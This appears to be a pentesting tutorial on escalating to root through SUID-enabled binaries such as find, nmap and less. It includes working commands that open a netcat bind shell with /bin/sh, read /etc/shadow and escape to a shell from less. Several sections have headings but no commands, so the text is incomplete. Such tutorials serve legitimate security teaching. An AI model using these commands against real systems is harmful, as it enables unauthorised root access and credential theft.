SUID (Set User ID) is a type of permission which is given to a file and allows users to execute the file with the permissions of its owner. There are plenty of reasons why a Linux binary can have this type of permission set. For example the ping utility require root privileges in order to open a network socket but it needs to be executed by standard users as well to verify connectivity with other hosts.

However some of the existing binaries and utilities can be used to escalate privileges to root if they have the SUID permission. Known Linux executables that can allow privilege escalation are:

Nmap

Vim

find

Bash

More

Less

Nano

cp

The following commands can discover all the SUID executables that are running on the system. More specifically the commands will try to find files in the / directory owned by the user root that have the SUID permission bits, print them and then redirect all errors to /dev/null in order to list only the binaries that the user has permissions to access.

Nmap

Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. Since Nmap is in the list of binaries that is executed with root privileges it is possible to use the interactive console in order to run a shell with the same privileges.

nmap -V

Nmap Version Identification

The interactive mode can start by executing Nmap with the parameter “interactive”

Find

The utility find can be used to discover stored on the system. However it is the ability to execute commands. Therefore if it is configured to run with the SUID permission all the commands that will executed through find will be executed as root.

touch pentestlab
find pentestlab -exec whoami \;

Find Command Execution

Since the majority of the Linux operating system have netcat installed it is possible to upgrade the elevated command execution into a root shell.

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

Run Netcat via Find

Connecting into the opened port will give a root shell.

netcat 192.168.1.189 5555
id
cat /etc/shadow

Root Shell via Find

Vim

The main use of Vim is to be text editor. However if it runs as SUID it will inherit the permission of the root user and therefore it could read all files on the system.

Bash

Less

The utility Less can also execute an elevated shell. The same principle applies and for the More command.

less /etc/passwd
!/bin/sh

Less – Root Shell

Conclusion

Performing privilege escalation by misconfigured SUID executables is trivial. Therefore administrators should evaluate all the SUID binaries and whether they need to run with the permissions of an elevated user. Particular focus should be given to applications with the ability to execute code or write arbitrary data on the system.